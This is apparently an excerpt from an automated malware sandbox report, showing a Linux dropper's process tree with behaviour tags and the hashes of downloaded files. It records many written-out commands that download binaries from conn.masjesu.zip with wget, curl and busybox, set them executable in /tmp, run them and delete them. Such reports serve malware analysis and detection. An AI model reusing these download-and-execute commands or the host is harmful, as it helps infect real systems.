/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- System Network Configuration Discovery
PID:969
-
-
/bin/chmodchmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:977
-
-
/bin/chmodchmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- System Network Configuration Discovery
PID:985
-
-
/bin/chmodchmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1./phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:995
-
-
/bin/rmrm phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- System Network Configuration Discovery
PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- System Network Configuration Discovery
PID:1009
-
-
/bin/chmodchmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:1012
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:1013
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1014
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:1016
-
-
/bin/chmodchmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- File and Directory Permissions Modification
PID:1017
-
-
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Executes dropped EXE
PID:1018
-
-
/bin/rmrm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:1020
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:1021
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1022
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- System Network Configuration Discovery
PID:1024
-
-
/bin/chmodchmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- File and Directory Permissions Modification
PID:1025
-
-
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Executes dropped EXE
PID:1026
-
-
/bin/rmrm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:1027
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:1028
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1029
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- System Network Configuration Discovery
PID:1031
-
-
/bin/chmodchmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- File and Directory Permissions Modification
PID:1032
-
-
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Executes dropped EXE
PID:1033
-
-
/bin/rmrm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:1034
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:1035
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1036
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- System Network Configuration Discovery
PID:1038
-
-
/bin/chmodchmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- File and Directory Permissions Modification
PID:1039
-
-
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Executes dropped EXE
PID:1040
-
-
/bin/rmrm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:1041
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97